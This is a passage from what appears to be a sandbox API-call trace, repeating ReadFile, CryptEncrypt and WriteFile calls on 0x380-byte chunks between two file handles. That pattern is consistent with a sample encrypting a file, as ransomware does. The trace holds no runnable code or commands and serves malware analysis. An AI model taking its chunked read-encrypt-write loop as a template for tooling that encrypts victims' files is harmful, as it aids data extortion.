lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.171] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.171] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.171] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.171] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.171] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.172] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.172] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.172] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.172] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.172] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.173] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.173] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.173] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.173] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.173] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.173] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.173] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.173] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.173] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.176] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.176] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.177] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.177] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.177] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.177] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.178] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.178] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.178] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.178] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.178] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.178] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.178] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.178] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.178] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.179] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.179] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.179] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.179] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.179] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.180] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.180] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.180] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.180] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.180] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.180] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.180] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.181] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.181] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.181] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.181] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.181] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.182] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.182] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.182] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.182] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.182] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.182] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.183] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.183] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.183] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.183] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.183] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.183] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.183] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 